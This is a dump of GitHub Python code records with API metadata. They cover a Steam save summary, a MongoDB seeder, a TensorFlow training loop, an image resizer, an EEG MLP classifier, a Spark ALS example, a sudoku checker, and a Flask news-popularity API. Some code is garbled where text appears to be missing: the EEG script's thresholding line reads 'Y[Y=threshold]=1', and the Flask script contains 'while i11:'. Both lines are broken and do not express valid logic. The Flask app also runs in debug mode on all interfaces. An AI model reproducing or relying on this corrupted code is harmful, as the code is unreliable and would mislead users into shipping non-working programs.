"line_number": 19, "usage_type": "name"}, {"api_name": "numpy.append", "line_number": 24, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 22, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.median", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.jit", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.searchsorted", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.jit", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numba.prange", "line_number": 74, "usage_type": "call"}, {"api_name": "numba.prange", "line_number": 75, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "41733890021", "text": "from . import err\nfrom .err import err_enum\nfrom enum import IntEnum\nimport datetime\nfrom zoneinfo import ZoneInfo\n\ng_truncate_max = 1000\n\n'''\n[\n {\n 'name': game_name0\n 'files': [\n {\n 'filename': file_name0,\n 'old_time': time_str\n 'new_time': time_str\n },\n {\n 'filename': file_name1,\n 'old_time': time_str\n 'new_time': time_str\n },\n ...\n ]\n },\n {\n ...\n },\n]\n'''\n\nclass level_e(IntEnum):\n NONE = 0\n GAME = 1\n FILE = 2\n TIME = 3\n\nclass summary:\n def __init__(self, level:int):\n self.data = list()\n self.level = level\n # Steam timezone is in PST\n self.local_tz = datetime.datetime.now().astimezone().tzinfo\n self.server_tz = ZoneInfo(\"America/Los_Angeles\")\n\n def add_game(self, game_name:str):\n if len(self.data) != 0 and self.data[-1]['name'] == game_name:\n return\n self.data.append({'name': game_name, 'files': list()})\n\n def add_game_file(\n self,\n game_name:str,\n file_name:str,\n timestamp_old,\n timestamp_new:str):\n\n if self.data[-1]['name'] != game_name:\n return\n\n def to_string(time):\n if time is None:\n return None\n\n target_time = time.replace(tzinfo=self.server_tz).astimezone(self.local_tz).replace(tzinfo=None)\n\n now = datetime.datetime.now()\n\n if target_time.year == now.year:\n return target_time.strftime(\"%m-%d %H:%M\")\n else:\n return target_time.isoformat(' ', 'minutes')\n\n self.data[-1]['files'].append(\n {\n 'filename': file_name,\n 'old_time': to_string(timestamp_old),\n 'new_time': to_string(timestamp_new)\n })\n\n\n def has_changes(self):\n return len(self.data) != 0\n\n def get(self):\n if len(self.data) == 0:\n return None\n if self.level == level_e.NONE:\n return None\n text = \"Execute summary:\\n\"\n\n for game in self.data:\n text += f\"- {game['name']}\\n\"\n\n if (len(text) > g_truncate_max):\n text += \"Truncated...\\n\"\n return text\n\n if self.level < level_e.FILE:\n continue\n\n for file in game['files']:\n text += f\" - {file['filename']}\"\n\n if (len(text) > g_truncate_max):\n text += \"\\nTruncated...\\n\"\n return text\n\n if self.level < level_e.TIME:\n text += \"\\n\"\n continue\n if file['old_time']:\n text += f\" ({file['old_time']} -> {file['new_time']})\\n\"\n else:\n text += f\" (new {file['new_time']})\\n\"\n\n return text\n", "repo_name": "pyscsd/steamCloudSaveDownloader", "sub_path": "steamCloudSaveDownloader/summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "enum.IntEnum", "line_number": 33, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "zoneinfo.ZoneInfo", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "attribute"}]}
+{"seq_id": "28035186074", "text": "from config.models import Author , Quote\nfrom mongoengine.errors import NotUniqueError\nfrom config.db import mongoconect\nimport json\nfrom pathlib import Path\n\n#path = Path('python_web16_hw9' / 'python_web16_hw9' / 'spiders') / 'python_web16_hw9' / 'python_web16_hw9' / 'spiders'/)\n\n\nauthor_data = 'python_web16_hw9/python_web16_hw9/spiders/authors.json'\nquote_data = 'python_web16_hw9/python_web16_hw9/spiders/quotes.json'\n\ndef data_load(data):\n with open(data, encoding='utf-8') as fd:\n data_json = json.load(fd)\n return(data_json)\n\n\ndef qoute(data_q):\n for el in data_load(data_q):\n try:\n author, *_ = Author.objects(fullname=el.get('author'))\n quote = Quote(quote=el.get('quote'), tags=el.get('tags'), author=author)\n quote.save()\n except ValueError:\n print(\"Автора не існує в таблиці авторів\")\n\ndef author(data_a):\n for el in data_load(data_a):\n try:\n author = Author(fullname=el.get('fullname'), born_date=el.get('born_date'),\n born_location=el.get('born_location'), description=el.get('description'))\n author.save()\n except NotUniqueError:\n print(f\"Автор вже існує {el.get('fullname')}\")\n\nif __name__ == \"__main__\":\n mongoconect()\n author(author_data)\n qoute(quote_data)\n", "repo_name": "MSRoma/python_web_hw9", "sub_path": "seed.py", "file_name": "seed.py", "file_ext": "py", "file_size_in_byte": 1426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.load", "line_number": 15, "usage_type": "call"}, {"api_name": "config.models.Author.objects", "line_number": 22, "usage_type": "call"}, {"api_name": "config.models.Author", "line_number": 22, "usage_type": "name"}, {"api_name": "config.models.Quote", "line_number": 23, "usage_type": "call"}, {"api_name": "config.models.Author", "line_number": 31, "usage_type": "call"}, {"api_name": "mongoengine.errors.NotUniqueError", "line_number": 34, "usage_type": "name"}, {"api_name": "config.db.mongoconect", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "71311786972", "text": "import tensorflow as tf \nfrom hyperparams import Hyperparams\nfrom data_loader import Train_data_loader, Val_data_loader, Test_data_loader\nfrom model import Model\nimport logging, pandas\nimport numpy as np\n\n#logger configuration\nFORMAT = \"[%(filename)s: %(lineno)3s] %(levelname)s: %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\nH = Hyperparams()\n\ntrain_batch_generator = Train_data_loader(H.train_batch_size, H.num_train)\nval_batch_generator = Val_data_loader(H.val_batch_size, H.num_train)\ntest_batch_generator = Test_data_loader(H.test_batch_size)\nlogger.info(\"Generators instantiated\")\n\nmodel = Model().get_model()\nlogger.info(\"Model loaded\")\n\nadam = tf.keras.optimizers.Adam(lr=H.learning_rate)\nmodel.compile(optimizer=adam, loss='mean_squared_error')\nlogger.info(\"Model compiled\")\n\nbaseline_loss = H.baseline\nlogger.info(\"Beginning training\")\nnum_batch = H.num_train//H.train_batch_size\nshuffled_batch = np.array([np.random.choice(num_batch, size=(num_batch), replace=False) for _ in range(H.num_epochs)])\nloss = np.zeros(shape=(num_batch))\nfor epoch in range(H.num_epochs):\n\tfor batch_idx in shuffled_batch[epoch]:\n\t\timg_batch, labels_batch = train_batch_generator[batch_idx]\n\t\tloss[batch_idx] = model.train_on_batch(img_batch, labels_batch, class_weight={0:H.x1, 1:H.x2_x1, 2:H.y1, 3:H.y2_y1})\n\t\tlogger.info(\"Epoch : {}, Step : {}, Loss : {}\".format(epoch, batch_idx, loss[batch_idx]))\n\t\tif loss[batch_idx] < baseline_loss:\n\t\t\tmodel.save_weights(\"saved_weights/model_{}.h5\".format(np.rint(loss[batch_idx])))\n\t\t\tbaseline_loss = loss[batch_idx]\n\t\t\tlogger.info(\"New best selected - {}\".format(loss))\n\tmodel.save_weights(\"saved_weights/model_epoch_{}.h5\".format(epoch))\n\tlogger.info(\"Model weights - model_epoch_{} saved\".format(epoch))\n\tval_loss = model.evaluate_generator(generator=val_batch_generator, steps=H.num_val//H.val_batch_size, \n\t\tmax_queue_size=3, use_multiprocessing=False, verbose=2)\n\tavg_train_loss = np.mean(loss)\n\tlogger.info(\"Avg Train Loss for Epoch : {} is {}\".format(epoch, avg_train_loss))\n\tlogger.info(\"Validation - Epoch : {}, Val_Loss : {}\".format(epoch, val_loss))\n", "repo_name": "yashjakhotiya/Flipkart-GRiD-Challenge-2019", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2153, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "hyperparams.Hyperparams", "line_number": 13, "usage_type": "call"}, {"api_name": "data_loader.Train_data_loader", "line_number": 15, "usage_type": "call"}, {"api_name": "data_loader.Val_data_loader", "line_number": 16, "usage_type": "call"}, {"api_name": "data_loader.Test_data_loader", "line_number": 17, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "model.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.choice", 
"line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "model.train_on_batch", "line_number": 35, "usage_type": "call"}, {"api_name": "model.save_weights", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 38, "usage_type": "call"}, {"api_name": "model.save_weights", "line_number": 41, "usage_type": "call"}, {"api_name": "model.evaluate_generator", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "17063660694", "text": "import os\nfrom PIL import Image\n\n# Changing the working path\npath = input(\"input working path : \") + '/'\nos.chdir(path)\nos.getcwd()\n\n# image size conversion\nthumb = input(\"input thumb name : \")\nif thumb in os.listdir(path) :\n image = Image.open(thumb)\n\n placehold_image = image.resize((230, 129))\n thumb_image = image.resize((535, 301))\n thumb2x_image = image.resize((1070, 602))\n\n filename, fileExtension = os.path.splitext(thumb)\n\n if fileExtension == '.jpg':\n placehold_image.save(path + thumb + '_placehold.jpg', quality=95)\n thumb_image.save(path + thumb + '_thumb.jpg', quality=95)\n thumb2x_image.save(path + thumb + '_thumb@2x.jpg', quality=95)\n else:\n placehold_image.convert(\"RGB\").save(path + thumb + '_placehold.jpg')\n thumb_image.convert(\"RGB\").save(path + thumb + '_thumb.jpg')\n thumb2x_image.convert(\"RGB\").save(path + thumb + '_thumb@2x.jpg')\n\nelse :\n print('Wrong Thumbnail name. Please check')\n\n", "repo_name": "jihunparkme/this-and-that-py", "sub_path": "make_gitblog_thumbnail.py", "file_name": "make_gitblog_thumbnail.py", "file_ext": "py", "file_size_in_byte": 978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}]}
+{"seq_id": "39617438276", "text": "import h5py\nimport matplotlib.pyplot as plt\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler # doctest: +SKIP\nfrom sklearn.decomposition import PCA\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport scipy as sp\nfname = \"C:/Users/AlessioB/Desktop/REFTEP ANN/sub-1_band-mu_iplv.mat\"\nmat1 = h5py.File(fname)\nfname = \"C:/Users/AlessioB/Desktop/REFTEP ANN/sub-1_band-betalow_iplv.mat\"\nmat2 = h5py.File(fname)\nfname = \"C:/Users/AlessioB/Desktop/REFTEP ANN/sub-1_band-betahigh_iplv.mat\"\nmat3 = h5py.File(fname)\n\n\nX = np.hstack((mat1['iPLV'].value[:,::20],\n mat2['iPLV'].value[:,::20],\n mat3['iPLV'].value[:,::20]))\n\nY = mat1['AmpsMclean'].value\n\nY=np.log(Y.T)\n#Y=sp.stats.zscore(Y)\n#plt.hist(Y)\n\nY=Y[:,0]\nthreshold=np.median(Y)\nY[Y=threshold]=1\n\nX=X[:,np.std(X,0)>0]\nX=np.log(np.abs(X)/(1-np.abs(X)))\n#X=sp.stats.zscore(X)\n\n#pca = PCA(n_components=2)\n#pca.fit(X.T)\n#Xred=pca.components_.T\n#Xred=sp.stats.zscore(Xred)\n\n\n#vectvox=np.random.randint(0,X.shape[1],100)\n#vectvox=np.random.permutation(100)\n#Xred=X[:,vectvox_app_fewer[vectvox[1:50]]]\n\nXred=X \nNVox=Xred.shape[1]\nSizeLayer=int(NVox/10)\nres=np.zeros(100)\nfor iiter in range(100):\n X_train, X_test, y_train, y_test = train_test_split(Xred, Y, train_size=0.75)\n scaler = StandardScaler() # doctest: +SKIP\n scaler.fit(X_train) # doctest: +SKIP\n X_train = scaler.transform(X_train) # doctest: +SKIP\n X_test = scaler.transform(X_test) # doctest: +SKIP\n clf = MLPClassifier(hidden_layer_sizes=(SizeLayer), activation='relu', max_iter=500).fit(X_train, y_train)\n res[iiter]=clf.score(X_test, y_test)\n\n\nplt.hist(res)\nplt.show()", "repo_name": "robbisg/mvpa_itab_wu", "sub_path": "scripts/mambo/reftep/mlp.py", "file_name": "mlp.py", "file_ext": "py", "file_size_in_byte": 1868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "h5py.File", "line_number": 13, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 15, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "28478019147", "text": "from __future__ import print_function\n\nimport sys\n\nimport numpy as np\nfrom numpy.random import rand\nfrom numpy import matrix\nfrom pyspark.sql import SparkSession\n\nLAMBDA = 0.01 # regularization\nnp.random.seed(42)\n\n\ndef rmse(R, ms, us):\n diff = R - ms * us.T\n return np.sqrt(np.sum(np.power(diff, 2)) / (M * U))\n\n\ndef update(i, mat, ratings):\n uu = mat.shape[0]\n ff = mat.shape[1]\n\n XtX = mat.T * mat\n Xty = mat.T * ratings[i, :].T\n\n for j in range(ff):\n XtX[j, j] += LAMBDA * uu\n\n return np.linalg.solve(XtX, Xty)\n\n\nif __name__ == \"__main__\":\n\n \"\"\"\n Usage: als [M] [U] [F] [iterations] [partitions]\"\n \"\"\"\n\n print(\"\"\"WARN: This is a naive implementation of ALS and is given as an\n example. Please use pyspark.ml.recommendation.ALS for more\n conventional use.\"\"\", file=sys.stderr)\n\n spark = SparkSession\\\n .builder\\\n .appName(\"PythonALS\")\\\n .getOrCreate()\n\n sc = spark.sparkContext\n\n M = int(sys.argv[1]) if len(sys.argv) > 1 else 100\n U = int(sys.argv[2]) if len(sys.argv) > 2 else 500\n F = int(sys.argv[3]) if len(sys.argv) > 3 else 10\n ITERATIONS = int(sys.argv[4]) if len(sys.argv) > 4 else 5\n partitions = int(sys.argv[5]) if len(sys.argv) > 5 else 2\n\n print(\"Running ALS with M=%d, U=%d, F=%d, iters=%d, partitions=%d\\n\" %\n (M, U, F, ITERATIONS, partitions))\n\n R = matrix(rand(M, F)) * matrix(rand(U, F).T)\n ms = matrix(rand(M, F))\n us = matrix(rand(U, F))\n\n Rb = sc.broadcast(R)\n msb = sc.broadcast(ms)\n usb = sc.broadcast(us)\n\n for i in range(ITERATIONS):\n ms = sc.parallelize(range(M), partitions) \\\n .map(lambda x: update(x, usb.value, Rb.value)) \\\n .collect()\n # collect() returns a list, so array ends up being\n # a 3-d array, we take the first 2 dims for the matrix\n ms = matrix(np.array(ms)[:, :, 0])\n msb = sc.broadcast(ms)\n\n us = sc.parallelize(range(U), partitions) \\\n .map(lambda x: update(x, msb.value, Rb.value.T)) \\\n .collect()\n us = matrix(np.array(us)[:, :, 0])\n usb = sc.broadcast(us)\n\n error = rmse(R, ms, us)\n print(\"Iteration %d:\" % i)\n print(\"\\nRMSE: %5.4f\\n\" % error)\n\n spark.stop()\n", "repo_name": "data-science-on-aws/data-science-on-aws", "sub_path": "06_prepare/archive/spark/spark-2.4.6-bin-without-hadoop/examples/src/main/python/als.py", "file_name": "als.py", "file_ext": "py", "file_size_in_byte": 2276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3220, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.seed", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 42, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 42, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", 
"line_number": 51, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "27410904232", "text": "#\n# @lc app=leetcode id=36 lang=python3\n#\n# [36] Valid Sudoku\n#\nfrom typing import List\n\n# @lc code=start\nimport math\nfrom collections import defaultdict\n\n\nclass Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n rows = defaultdict(set)\n columns = defaultdict(set)\n boxes = defaultdict(set)\n\n for r, row in enumerate(board):\n for c, value in enumerate(row):\n if value == \".\":\n continue\n\n value = int(value)\n b = math.floor(c / 3) + math.floor(r / 3) * 3\n\n if value in rows[r] or value in columns[c] or value in boxes[b]:\n return False\n\n rows[r].add(value)\n columns[c].add(value)\n boxes[b].add(value)\n\n return True\n\n\n# @lc code=end\n\nboard = [\n [\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"],\n]\n\ns = Solution()\nprint(s.isValidSudoku(board))\n", "repo_name": "brxck/leetcode", "sub_path": "36.valid-sudoku.py", "file_name": "36.valid-sudoku.py", "file_ext": "py", "file_size_in_byte": 1359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 16, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 17, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "41446162322", "text": "import flask\nfrom flask import request, jsonify\nimport pandas as pd\nimport numpy as np\nfrom textblob import TextBlob\nfrom collections import Counter\nimport sys\nimport nltk\nimport requests\nfrom bs4 import BeautifulSoup\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom nltk.corpus import stopwords\nimport operator\nfrom summa import keywords\nfrom summa.summarizer import summarize\nfrom datetime import datetime, timedelta\nfrom flask_cors import CORS\n\n\ndef readwords( filename ):\n f = open(filename,encoding=\"ISO-8859-1\")\n words = [ line.rstrip() for line in f.readlines()]\n return words\n\npositive = readwords('positive.txt')\nnegative = readwords('negative.txt')\n\n\n\ntdf = pd.read_csv(\"OnlineNewsPopularity.csv\")\npdf = tdf[[' timedelta', ' n_tokens_title', ' n_tokens_content',' num_imgs',' num_videos',' num_hrefs',' global_subjectivity',' global_sentiment_polarity',' global_rate_positive_words',' global_rate_negative_words',' title_subjectivity',' title_sentiment_polarity',' shares']].copy()\nX = pdf.drop([' shares',' timedelta'],axis=1)\ny = pdf[' shares']\nlm = LinearRegression()\nX_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.33, random_state=42)\nlm.fit(X_train,y_train)\n\n\n\n\napp = flask.Flask(__name__)\nCORS(app)\napp.config[\"DEBUG\"] = True\n\ndef structural_analysis(title,text,image_count,video_count,link_count):\n\ttext = text.lower()\n\ttitle = title.lower()\n\ttokens_title = nltk.word_tokenize(title)\n\ttokens_content = nltk.word_tokenize(text)\n\tn_tokens_title = len(tokens_title)\n\tn_tokens_content = len(tokens_content)\n\tglobal_subjectivity = TextBlob(text).sentiment[1]\n\tglobal_sentiment_polarity = TextBlob(text).sentiment[0]\n\ttitle_subjectivity = TextBlob(title).sentiment[1]\n\ttitle_sentiment_polarity = TextBlob(title).sentiment[0]\n\tpos = 0\n\tneg = 0\n\tfor key in tokens_content:\n\t\tkey = key.rstrip('.,?!\\n')\n\t\tif key in positive:\n\t\t\tpos += 1\n\t\tif key in negative:\n\t\t\tneg += 1\n\tglobal_rate_positive_words = pos/n_tokens_content\n\tglobal_rate_negative_words = pos/n_tokens_content\n\tnum_imgs = image_count\n\tnum_videos = video_count\n\tnum_hrefs = link_count\n\td = {' n_tokens_title':n_tokens_title, ' n_tokens_content':n_tokens_content, ' num_imgs':num_imgs, ' num_videos':num_videos,' num_hrefs':num_hrefs, ' global_subjectivity':global_subjectivity, ' global_sentiment_polarity':global_sentiment_polarity,' global_rate_positive_words':global_rate_positive_words, ' global_rate_negative_words':global_rate_negative_words,' title_subjectivity':title_subjectivity, ' title_sentiment_polarity':title_sentiment_polarity}\n\tldf = pd.DataFrame(data=d,index=[0])\n\treturn(lm.predict(ldf))\n\ndef trendanalysis(title,text,city):\n\tnew_trends = []\n\tfor i in range(0,5):\n\t\tdate_N_days_ago = datetime.now() - timedelta(days=i)\n\t\tnew_date = str(date_N_days_ago.year)+\"-\"+str(date_N_days_ago.month)+\"-\"+str(date_N_days_ago.day)\n\n\t\tpage = requests.get(\"https://trendogate.com/placebydate/\"+city+\"/\"+new_date)\n\t\tsoup = BeautifulSoup(page.content, 'html.parser')\n\t\ttrends = soup.find_all('li', attrs = {'class':'list-group-item'})\n\t\tfor i in range(len(trends)):\n\t\t\tif ((((str(trends[i]).split())[-1]).split('<'))[0]) not in new_trends:\n\t\t\t\tnew_trends.append(((((str(trends[i]).split())[-1]).split('<'))[0]))\n\n\tnew_trends = new_trends[0:40]\n\twordlist = []\n\tfor i in 
new_trends:\n\t\tif(i=='#'):\n\t\t\tcontinue\n\t\t\n\t\tif(i[0]=='#'):\n\t\t\twordlist.append(i[1:])\n\t\telse:\n\t\t\twordlist.append(i)\n\tprint(wordlist)\n\ttext = text.lower()\n\ttokens = [t for t in text.split()]\n\tclean_tokens = tokens[:]\n\tsr = stopwords.words('english')\n\tfor token in tokens:\n\t if token in stopwords.words('english'):\n\t clean_tokens.remove(token)\n\t freq = nltk.FreqDist(clean_tokens)\n\t sorted_list = sorted(\n\t freq.items(), key=operator.itemgetter(1), reverse=True)\n\tlist = []\n\tfor listitem in sorted_list:\n\t list.append(listitem[0])\n\ttaglist = nltk.tag.pos_tag(list)\n\tfinallist = []\n\tfinallist.append(taglist[0][0])\n\tfinallist.append(taglist[1][0])\n\tfinallist.append(taglist[2][0])\n\ti=2\n\twhile i11:\n\t\t\t\tbreak\n\t\t\t\n\t\t\tif i[1]=='NN' or i[1]=='NNS':\n\t\t\t\tif i[0] not in finallist:\n\t\t\t\t\tfinallist.append(i[0])\n\ttemps = summarize(text, ratio=0.1)\n\tif temps:\n\t\tanother_temp = keywords.keywords(temps).split('\\n')\n\t\tfor i in nltk.pos_tag(another_temp):\n\t\t\tif len(finallist)>15:\n\t\t\t\tbreak\n\n\t\t\tif i[0] not in finallist and (i[1]=='NN' or i[1]=='NNS'):\n\t\t\t\tfinallist.append(i[0])\n\n \n\tscore = 0\n\tfor i in finallist:\n\t\tfor j in wordlist:\n\t\t\tif nltk.edit_distance(i,j) <=2:\n\t\t\t\tscore = score+1\n\ttokens_title = nltk.word_tokenize(title)\n\tfor i in tokens_title:\n\t\tfor j in wordlist:\n\t\t\tif nltk.edit_distance(i,j) <=2:\n\t\t\t\tscore = score+1\n\tprint(score)\n\treturn(score)\n\n@app.route('/',methods=['GET','POST'])\n\ndef home():\n\tjson_data = request.get_json()\n\ttitle = json_data[\"title\"]\n\ttext = json_data[\"text\"]\n\timage_count = json_data[\"image_count\"]\n\tvideo_count = json_data[\"video_count\"]\n\tlink_count = json_data[\"link_count\"]\n\tcity_c = json_data[\"location\"]\n\tstructural_a = structural_analysis(title,text,image_count,video_count,link_count)\n\ttrend_a = trendanalysis(title,text,city_c)\n\tresult = []\n\tresult.append(trend_a)\n\tresult.append(structural_a)\n\tprint(\"API called\")\n\treturn(jsonify({\"structural_a\":structural_a[0],\"trend_a\":trend_a}))\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port='5000')\n", "repo_name": "hridyansh68/App_Rate_US", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 42, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 43, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 49, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 50, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 53, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 54, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 55, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, 
